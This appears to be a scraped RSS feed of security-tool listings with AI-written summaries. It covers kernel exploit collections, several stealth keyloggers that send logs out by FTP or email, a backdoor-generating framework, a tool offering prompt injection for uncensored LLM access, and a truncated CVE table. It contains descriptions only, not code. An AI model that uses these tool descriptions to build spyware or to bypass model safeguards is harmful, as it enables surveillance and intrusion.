&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; K8tools is a collection of security research and penetration testing tools designed for use in various environments, including remote command execution and web shells. Notably, these tools are modified to enhance compatibility and stability, catering to security professionals who require reliable functionalities. The repository serves as a hub for downloading tools, accessing documentation, and submitting feedback for continuous improvement.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="k8tools"&gt;K8tools&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/k8gege"&gt;&lt;img src="https://img.shields.io/badge/Author-k8gege-blueviolet" alt="Author"&gt;&lt;/a&gt;
&lt;a href="https://github.com/k8gege/K8tools/issues"&gt;&lt;img src="https://img.shields.io/github/issues/k8gege/K8tools" alt="GitHub issues"&gt;&lt;/a&gt;
&lt;a href="https://github.com/k8gege/K8tools/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/k8gege/K8tools" alt="Github Stars"&gt;&lt;/a&gt;
&lt;a href="https://github.com/k8gege/K8tools/network/members"&gt;&lt;img src="https://img.shields.io/github/forks/k8gege/K8tools" alt="GitHub forks"&gt;&lt;/a&gt;
&lt;a href="https://github.com/k8gege/K8tools/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/k8gege/K8tools" alt="GitHub license"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://k8gege.org/k8img/title/gun5.jpg" alt="image"&gt;&lt;/p&gt;
&lt;p&gt;声明: 工具仅供安全研究或授权渗透，非法用途后果自负。&lt;br&gt;
下载: &lt;a href="https://github.com/k8gege/K8tools"&gt;https://github.com/k8gege/K8tools&lt;/a&gt;&lt;br&gt;
文档: &lt;a href="http://k8gege.org/p/72f1fea6.html"&gt;http://k8gege.org/p/72f1fea6.html&lt;/a&gt;&lt;br&gt;&lt;/p&gt;</description></item><item><title>karma_v2</title><link>https://rainmana.github.io/hackyfeed/tools/dheerajmadhukar-karma_v2/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dheerajmadhukar-karma_v2/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Karma v2 is a passive open-source intelligence (OSINT) automated reconnaissance framework designed for information security researchers, penetration testers, and bug hunters to gather extensive details about target systems. It integrates with the Shodan Premium API to perform a variety of scans including SSL certificate verification, vulnerability detection, and asset discovery, and it features capabilities like fetching IP banners and interesting leaks across numerous protocols and services. The tool&amp;rsquo;s output can be displayed in the terminal and saved to files for further analysis.&lt;/p&gt;</description></item><item><title>KawaiiGPT</title><link>https://rainmana.github.io/hackyfeed/tools/marcmcbri1982-kawaiigpt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/marcmcbri1982-kawaiigpt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KawaiiGPT is an open-source command-line tool that provides seamless access to various large language models, including DeepSeek, Gemini, and Kimi-K2, through a reverse-engineered Pollinations API without the need for API keys. It features integrated prompt injection capabilities for security research, allowing for uncensored model access and red-team evaluations, along with native support for Linux and Termux, and a user-friendly console interface. Notably, it offers easy configuration options and a streamlined installation process via a single command.&lt;/p&gt;</description></item><item><title>kb</title><link>https://rainmana.github.io/hackyfeed/tools/gnebbia-kb/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gnebbia-kb/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; kb is a minimalist knowledge base manager designed for efficient organization and retrieval of information artifacts. It supports functionalities such as adding, viewing, editing, and deleting artifacts, alongside advanced searching options including grep capabilities and template management for better categorization. Notably, it allows for easy import/export of knowledge bases and integrates seamlessly with multiple installation methods, enhancing its usability for various platforms.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="img/kb_logo.png?raw=true" width="200"/&gt;
&lt;/p&gt;
&lt;h1 id="kb-a-minimalist-knowledge-base-manager"&gt;kb. A minimalist knowledge base manager&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://travis-ci.com/gnebbia/kb"&gt;&lt;img src="https://travis-ci.com/gnebbia/kb.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>kernel-exploits</title><link>https://rainmana.github.io/hackyfeed/tools/bcoles-kernel-exploits/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bcoles-kernel-exploits/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The bcoles/kernel-exploits repository provides various updated local root exploit implementations targeting vulnerabilities in the Linux kernel, specifically those identified by their CVEs. Each exploit enables privilege escalation through vulnerabilities such as improper memory handling or mismanaged user namespaces, allowing attackers to gain root access under certain conditions. Notable features include detailed exploit descriptions and references to original sources for further investigation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="kernel-exploits"&gt;Kernel Exploits&lt;/h1&gt;
&lt;p&gt;Various kernel exploits&lt;/p&gt;
&lt;h2 id="cve-2021-22555"&gt;CVE-2021-22555&lt;/h2&gt;
&lt;p&gt;Linux local root exploit.&lt;/p&gt;</description></item><item><title>kernel-exploits</title><link>https://rainmana.github.io/hackyfeed/tools/xairy-kernel-exploits/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/xairy-kernel-exploits/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The xairy/kernel-exploits repository contains a collection of Linux kernel exploit code samples for various vulnerabilities, primarily focusing on local privilege escalation (LPE) and information leak scenarios. Each entry is associated with specific Common Vulnerabilities and Exposures (CVEs), detailing the exploit&amp;rsquo;s impact and vector, enhancing understanding and mitigation strategies for kernel security vulnerabilities. Notable features include the absence of licensing, making the code freely available for educational and research purposes.&lt;/p&gt;</description></item><item><title>kernelpwn</title><link>https://rainmana.github.io/hackyfeed/tools/smallkirby-kernelpwn/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/smallkirby-kernelpwn/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The kernelpwn repository serves as a comprehensive resource for Capture The Flag (CTF) challenges focused on kernel exploitation, providing both challenge write-ups and educational material for beginners in the field. It features a collection of solved kernel-pwn challenges with detailed write-ups, covering various complex exploitation techniques such as SMEP, SMAP, KPTI, and KASLR bypasses. Notable features include a focus on both kernel and non-userland vulnerabilities, as well as an invitation for community contributions to enhance the repository’s challenge offerings.&lt;/p&gt;</description></item><item><title>keychain</title><link>https://rainmana.github.io/hackyfeed/tools/danielrobbins-keychain/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/danielrobbins-keychain/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keychain is a tool designed to manage SSH and GPG keys efficiently by serving as a persistent frontend to &lt;code&gt;ssh-agent&lt;/code&gt; and &lt;code&gt;gpg-agent&lt;/code&gt;, allowing a single long-running instance per system. Its primary use case is to minimize the frequency of passphrase entries to once per reboot, enhancing security and convenience, especially for remote cron jobs. Notable features include seamless integration with key management, bash completion support for various command-line options, and user-friendly installation procedures.&lt;/p&gt;</description></item><item><title>Keylogger</title><link>https://rainmana.github.io/hackyfeed/tools/ajayrandhawa-keylogger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ajayrandhawa-keylogger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keylogger is a lightweight, open-source tool developed in Visual C++ for educational purposes, designed to monitor system activity by capturing keystrokes, mouse clicks, and periodic screenshots in stealth mode. Its notable features include FTP integration for automatic log uploads, the ability to run unnoticed in the background, and persistence through auto-start and auto-copy mechanisms. The tool emphasizes ethical use, warning against unauthorized application.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="keylogger"&gt;Keylogger&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://visitor-badge.laobi.icu/badge?page_id=ajayrandhawa.Keylogger&amp;amp;title=Visitor" alt="Visitor Badge"&gt;&lt;br&gt;
&lt;strong&gt;Please don&amp;rsquo;t forget to give us a ⭐ if you find this project useful!&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>Keylogger</title><link>https://rainmana.github.io/hackyfeed/tools/aydinnyunus-keylogger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aydinnyunus-keylogger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Keylogger tool captures keyboard, mouse, screenshot, and microphone inputs on a target computer and sends the collected data to the user&amp;rsquo;s email for security testing purposes. Notable features include self-deletion capabilities if the target discovers the code and automated data transmission every 10 seconds. The tool is easy to deploy by running a single script with minimal setup requirements.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="inputs-to-mail"&gt;Inputs To Mail.&lt;/h1&gt;
&lt;p&gt;Get Keyboard,Mouse,ScreenShot,Microphone Inputs and Send to your Mail.
Purpose of the project is testing the security of information systems&lt;/p&gt;</description></item><item><title>Keylogger</title><link>https://rainmana.github.io/hackyfeed/tools/giacomolaw-keylogger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/giacomolaw-keylogger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keylogger is a lightweight multi-platform tool designed to record keystrokes on Windows, Linux, and Mac OS, saving them to a local log file. Its primary use case includes personal monitoring for computer security and self-analysis, with notable features such as the ability to run in both visible and invisible modes on Windows, and a straightforward installation process across all supported operating systems.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="a-simple-keylogger-for-windows-linux-and-mac"&gt;A simple keylogger for Windows, Linux and Mac&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/mit-license.php"&gt;&lt;img src="https://badges.frapsoft.com/os/mit/mit.png?v=103" alt="MIT Licence"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>keypatch</title><link>https://rainmana.github.io/hackyfeed/tools/keystone-engine-keypatch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/keystone-engine-keypatch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keypatch is a plugin for IDA Pro that integrates the Keystone Assembler Engine, providing enhancements for binary patching during reverse engineering tasks. It features a Patcher for direct assembly input, a Fill Range tool, and a Search utility to locate assembly instructions within binaries. With support for multiple architectures and platforms, an event-driven UI for automated updates, and user-friendly options like automatic comments and undo functionality, Keypatch addresses the limitations of IDA&amp;rsquo;s built-in assembler while streamlining the reverse engineering process.&lt;/p&gt;</description></item><item><title>keystone</title><link>https://rainmana.github.io/hackyfeed/tools/keystone-engine-keystone/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/keystone-engine-keystone/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Keystone is a lightweight and versatile multi-platform assembler framework supporting various architectures including Arm, RISC-V, and X86, among others. It features a clean architecture-neutral API, is thread-safe, and provides bindings for multiple programming languages, making it an ideal tool for developers needing assembly capabilities across different environments. Built on LLVM, Keystone enhances functionality and offers open-source licensing options suitable for both personal and commercial use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="keystone-engine"&gt;Keystone Engine&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://travis-ci.org/keystone-engine/keystone"&gt;&lt;img src="https://travis-ci.org/keystone-engine/keystone.svg?branch=master" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://semaphoreci.com/aquynh/keystone"&gt;&lt;img src="https://semaphoreci.com/api/v1/aquynh/keystone/branches/master/badge.svg" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://ci.appveyor.com/project/aquynh/keystone"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/c27slvyrijiejvqs?svg=true" alt="Build status"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>kics</title><link>https://rainmana.github.io/hackyfeed/tools/checkmarx-kics/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/checkmarx-kics/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KICS (Keeping Infrastructure as Code Secure) is an open-source tool designed to identify security vulnerabilities, compliance issues, and infrastructure misconfigurations in infrastructure-as-code early in the development cycle. It supports various platforms and offers a comprehensive set of queries for thorough analysis, making it essential for maintaining security in cloud-native projects. Notable features include its integration capabilities and extensive documentation for ease of use, enhancing security throughout the software development lifecycle.&lt;/p&gt;</description></item><item><title>killshot</title><link>https://rainmana.github.io/hackyfeed/tools/bahaabdelwahed-killshot/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bahaabdelwahed-killshot/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KillShot is a comprehensive penetration testing framework designed for information gathering and website vulnerability scanning. Its primary use case involves automating data collection through integrated tools such as WhatWeb and Nmap, while offering features like a CMS Exploit Scanner and web application vulnerability assessments, including XSS and SQL injection detection. The framework also facilitates backdoor generation and includes a fuzzer, making it a versatile tool for security professionals.&lt;/p&gt;</description></item><item><title>krane</title><link>https://rainmana.github.io/hackyfeed/tools/appvia-krane/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/appvia-krane/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Krane is a Kubernetes RBAC static analysis tool designed to identify security risks within K8s RBAC configurations and provide mitigation suggestions. Key features include a customizable set of built-in and user-defined risk rules, a user-friendly dashboard for visualizing RBAC posture, continuous analysis capabilities within clusters, and integration with Slack for alerting on significant risks. Additionally, Krane offers reporting in machine-readable formats and can be deployed locally, within CI/CD pipelines, or as a standalone service.&lt;/p&gt;</description></item><item><title>KsDumper</title><link>https://rainmana.github.io/hackyfeed/tools/equifox-ksdumper/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/equifox-ksdumper/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KsDumper is a kernel driver-based tool that enables the dumping of process memory for both x86 and x64 applications, particularly those protected by anti-cheat mechanisms such as EasyAntiCheat. It allows users to bypass restrictions on handle access by directly interfacing with the Windows kernel, facilitating the analysis of packed and protected game internals. Notable features include the ability to rebuild PE32/PE64 headers and sections, although it does not reconstruct the import table, making it primarily suited for reverse engineering and educational purposes.&lt;/p&gt;</description></item><item><title>ksm</title><link>https://rainmana.github.io/hackyfeed/tools/asamy-ksm/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/asamy-ksm/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KSM is a lightweight x64 hypervisor designed for Intel processors that functions primarily as an extra layer of protection for existing operating systems, rather than running other OS instances. Notable features include a self-contained physical memory introspection engine, userspace physical memory virtualization, IDT shadowing, and experimental support for nesting and APIC virtualization. It is compatible with both Windows and Linux kernels, making it suitable for security applications such as anti-virus and sandboxing.&lt;/p&gt;</description></item><item><title>KubeHound</title><link>https://rainmana.github.io/hackyfeed/tools/datadog-kubehound/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/datadog-kubehound/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; KubeHound is a Kubernetes attack graph tool designed to automatically calculate attack paths between assets within a cluster. It enables users to query and analyze security vulnerabilities through a graph-based representation of their Kubernetes environment, utilizing the Gremlin query language for advanced data exploration. Notable features include compatibility with Docker and Docker Compose, deployment as a service (KHaaS), and integration with graph query UIs, including a Jupyter notebook for user-friendly interaction with the attack graph data.&lt;/p&gt;</description></item><item><title>kubernetes-goat</title><link>https://rainmana.github.io/hackyfeed/tools/madhuakula-kubernetes-goat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/madhuakula-kubernetes-goat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Kubernetes Goat is an intentionally vulnerable Kubernetes cluster environment designed for the purpose of learning and practicing Kubernetes security. It provides various scenarios for security testing, including exploitation of sensitive keys, SSRF vulnerabilities, and container escapes, thereby enabling users to gain hands-on experience with real-world security challenges in Kubernetes. The tool requires administrative access to a Kubernetes cluster and facilitates setup using &lt;code&gt;kubectl&lt;/code&gt; and &lt;code&gt;helm&lt;/code&gt;, offering a structured learning path for security professionals.&lt;/p&gt;</description></item><item><title>kubestriker</title><link>https://rainmana.github.io/hackyfeed/tools/vchinnipilli-kubestriker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vchinnipilli-kubestriker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Kubestriker is a robust security auditing tool designed specifically for Kubernetes environments, facilitating the identification and mitigation of misconfigurations that may expose clusters to attacks. It offers extensive checks across multiple platforms, including self-hosted Kubernetes, Amazon EKS, Azure AKS, and Google GKE, alongside visualized attack path analytics to enhance situational awareness. Additionally, Kubestriker supports CI/CD pipeline integrations, enabling continuous security scanning during the deployment process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/vchinnipilli/kubestriker"&gt;&lt;img align="center" src="https://raw.githubusercontent.com/vchinnipilli/kubestriker/master/media/kube-striker.png" height="400" width="400"&gt;&lt;/a&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt; A Blazing fast Security Auditing tool for &lt;a href="https://kubernetes.io/" target="_blank"&gt;kubernetes&lt;/a&gt;!!&lt;/h4&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/python-v3.0+-blue.svg?style=plastic" alt="Python"&gt;
&lt;img src="https://img.shields.io/badge/contributions-welcome-orange.svg?style=plastic" alt="Contributions welcome"&gt;
&lt;a href="https://github.com/vchinnipilli/kubestrike/issues"&gt;&lt;img src="https://img.shields.io/github/issues/vchinnipilli/kubestriker?style=plastic" alt="GitHub Issues"&gt;&lt;/a&gt;
&lt;img src="https://img.shields.io/github/stars/vchinnipilli/kubestriker?style=plastic" alt="Stars Badge"&gt;
&lt;a href="https://hits.seeyoufarm.com"&gt;&lt;img src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fvchinnipilli%2Fkubestriker&amp;amp;count_bg=%2379C83D&amp;amp;title_bg=%23555555&amp;amp;icon=&amp;amp;icon_color=%23E7E7E7&amp;amp;title=Visitors&amp;amp;edge_flat=false" alt="Hits"&gt;&lt;/a&gt;
&lt;a href="https://github.com/vchinnipilli/kubestriker"&gt;&lt;img src="https://img.shields.io/badge/Maintained%3F-yes-green.svg?style=plastic" alt="Maintenance"&gt;&lt;/a&gt;
&lt;a href="https://opensource.org/licenses/Apache_License_2.0"&gt;&lt;img src="https://img.shields.io/badge/license-Apache_License_2.0-blue.svg?style=plastic" alt="License"&gt;&lt;/a&gt;
&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;</description></item><item><title>labs</title><link>https://rainmana.github.io/hackyfeed/tools/nixawk-labs/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nixawk-labs/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The nixawk/labs repository serves as a catalog of documented vulnerabilities, specifically Common Vulnerabilities and Exposures (CVEs), across various software systems, tools, and devices. The primary use case is to provide security professionals with a reference for known vulnerabilities and their implications, enhancing awareness and response strategies regarding potential exploits. Notable features include detailed entries for each CVE, outlining affected systems and specific attack vectors for exploitation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th style="text-align: left"&gt;&lt;em&gt;Name&lt;/em&gt;&lt;/th&gt;
 &lt;th style="text-align: left"&gt;&lt;em&gt;Description&lt;/em&gt;&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2015-5531&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-1909&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Fortinet FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5; FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8; and FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8 have a hardcoded passphrase for the Fortimanager_Access account, which allows remote attackers to obtain administrative access via an SSH session.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-10225&lt;/td&gt;
 &lt;td style="text-align: left"&gt;The sunxi-debug driver in Allwinner 3.4 legacy kernel for H3, A83T and H8 devices allows local users to gain root privileges by sending &amp;ldquo;rootmydevice&amp;rdquo; to /proc/sunxi_debug/sunxi_debug.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-3087&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Apache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! (exclamation mark) operator to the REST Plugin.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-4338&lt;/td&gt;
 &lt;td style="text-align: left"&gt;The mysql user parameter configuration script (userparameter_mysql.conf) in the agent in Zabbix before 2.0.18, 2.2.x before 2.2.13, and 3.0.x before 3.0.3, when used with a shell other than bash, allows context-dependent attackers to execute arbitrary code or SQL commands via the mysql.size parameter.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-5195&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka &amp;ldquo;Dirty COW.&amp;rdquo;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-6277&lt;/td&gt;
 &lt;td style="text-align: left"&gt;NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-6415&lt;/td&gt;
 &lt;td style="text-align: left"&gt;The server IKEv1 implementation in Cisco IOS 12.2 through 12.4 and 15.0 through 15.6, IOS XE through 3.18S, IOS XR 4.3.x and 5.0.x through 5.2.x, and PIX before 7.0 allows remote attackers to obtain sensitive information from device memory via a Security Association (SA) negotiation request, aka Bug IDs CSCvb29204 and CSCvb36055 or BENIGNCERTAIN.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2016-7124&lt;/td&gt;
 &lt;td style="text-align: left"&gt;ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1) __destruct call or (2) magic method call.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-0199&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka &amp;ldquo;Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.&amp;rdquo;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-1000353&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java &lt;code&gt;SignedObject&lt;/code&gt; object to the Jenkins CLI, that would be deserialized using a new &lt;code&gt;ObjectInputStream&lt;/code&gt;, bypassing the existing blacklist-based protection mechanism. We&amp;rsquo;re fixing this issue by adding &lt;code&gt;SignedObject&lt;/code&gt; to the blacklist. We&amp;rsquo;re also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-12615&lt;/td&gt;
 &lt;td style="text-align: left"&gt;When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-17411&lt;/td&gt;
 &lt;td style="text-align: left"&gt;This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges. Was ZDI-CAN-4892.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-5135&lt;/td&gt;
 &lt;td style="text-align: left"&gt;Certain Technicolor devices have an SNMP access-control bypass, possibly involving an ISP customization in some cases. The Technicolor (formerly Cisco) DPC3928SL with firmware D3928SL-P15-13-A386-c3420r55105-160127a could be reached by any SNMP community string from the Internet; also, you can write in the MIB because it provides write properties, aka Stringbleed. NOTE: the string-bleed/StringBleed-CVE-2017-5135 GitHub repository is not a valid reference as of 2017-04-27; it contains Trojan horse code purported to exploit this vulnerability.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-5638&lt;/td&gt;
 &lt;td style="text-align: left"&gt;The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td style="text-align: left"&gt;CVE-2017-5689&lt;/td&gt;
